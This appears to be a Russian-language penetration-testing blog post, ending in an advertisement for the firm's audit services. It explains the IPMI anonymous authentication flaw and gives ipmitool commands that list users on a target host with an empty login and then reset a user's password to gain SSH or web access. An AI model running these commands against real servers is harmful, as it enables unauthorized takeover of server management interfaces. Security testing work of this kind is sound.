Уязвимость IPMI Anonymous Authentication

IPMI старых версий подвержен множеству уязвимостей. Поэтому ответственным за серверную системы рекомендуется постоянно обновлять IPMI на серверах, а так же вынести его в изолированный сегмент. Одну из уязвимостей я описывал несколько лет назад в статье: Получение доступа к iLO через уязвимость IPMI Cipher 0. Сегодня мы поговорим о более простой уязвимости, которая часто появляется во время проведения теста на проникновение: доступу к IPMI без аутентификации.

Сначала установим все, что нам потребуется:

apt-get install ipmitool

Далее,найдя потенциально уязвимую систему, попробует получить список пользователей из IPMI:

ipmitool -I lanplus -H XXX.XXX.XXX.XXX -U '' -P '' user list

где:
-I – выбор протокола. lanplus говорит, что мы используем протокол IPMI v2.0 RMCP+ LAN Interface;
-HIP-адрес атакуемого хоста;
-U – имя пользователя (кавычки указывают, что без имени пользователя);
-P – пароль (кавычки указывают, что без пароля);
user list – получить список пользователей.

Если уязвимость присутствует, то мы увидим список пользователей.

Теперь можно сменить пароль какому-либо пользователю:

ipmitool -I lanplus -H XXX.XXX.XXX.XXX -U '' -P '' user set password X passpass

user set password X passpass – установить пользователю номер X (номер пользователя берем из списка, полученного ранее) пароль passpass.

Далее можно подключаться к IPMI через SSH или Web-интерфейс.

Заказать Аудит Безопасности или Пентест Вашей IT-инфраструктуры

Быть уверенным в своей IT-инфраструктуре – это быть уверенным в завтрашнем дне.

Для того, чтобы сделать заказ:

Заполните форму обратной связи и мы обязательно с вам свяжемся:
Форма обратной связи
Позвоните нам по телефону:
+7(909)952-44-33
Напишите нам на электронную почту:
order@blackdiver.net
Напишите нам в Telegram:
Telegram
Другие способы связи Вы сможете найти в разделе Контакты.

Please Login to Comment.